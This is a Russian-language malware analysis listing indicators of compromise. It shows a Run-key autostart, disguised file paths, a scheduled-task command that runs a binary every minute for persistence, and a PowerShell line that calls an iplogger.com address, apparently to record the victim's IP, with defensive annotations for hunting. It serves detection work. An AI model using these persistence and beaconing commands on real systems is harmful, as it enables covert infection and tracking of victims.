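Техническая информация
Подзаголовки разделов в этом фрагменте отсутствуют. Ниже перечислены: запись автозапуска в ветке реестра Run, пути к файлам и процессам, а также командные строки запускаемых процессов.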
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'wget' = '%HOMEPATH%\My Documents\wget.exe -boot'
- <SYSTEM32>\svchost.exe
- C:\ProgramData\WindowsTask\windir.exe
- %HOMEPATH%\My Documents\wget.exe
- 'C:\ProgramData\WindowsTask\windir.exe'
- '%HOMEPATH%\My Documents\wget.exe'
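- '<SYSTEM32>\schtasks.exe' /create /tn MyApp /tr C:\ProgramData\WindowsTask\windir.exe /ri 1 /st 00:00 /du 9999:59 /sc daily /f
  (Примечание: задача планировщика с именем MyApp запускает C:\ProgramData\WindowsTask\windir.exe ежедневно начиная с 00:00 с повтором каждую минуту (/ri 1) в течение 9999 ч 59 мин (/du); ключ /f перезаписывает существующую задачу с тем же именем без запроса. При проверке узла стоит искать задачу с таким именем и каталог C:\ProgramData\WindowsTask.)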
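- '<SYSTEM32>\cmd.exe' /C powershell $page = (New-Object System.Net.WebClient).DownloadString('https://iplogger.com/1RQ9V6')
  (Примечание: команда загружает содержимое указанного адреса на iplogger.com в переменную $page; в приведённой строке результат далее не используется. Вероятно, запрос нужен для регистрации IP-адреса заражённого узла — это предположение, на странице оно не подтверждено. Обращения к этому адресу в журналах прокси или DNS могут служить индикатором.)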
- '<SYSTEM32>\cmd.exe' /C md C:\ProgramData\WindowsTask
- '<SYSTEM32>\svchost.exe'
- '<SYSTEM32>\cmd.exe' /C schtasks /create /tn MyApp /tr C:\ProgramData\WindowsTask\windir.exe /ri 1 /st 00:00 /du 9999:59 /sc daily /f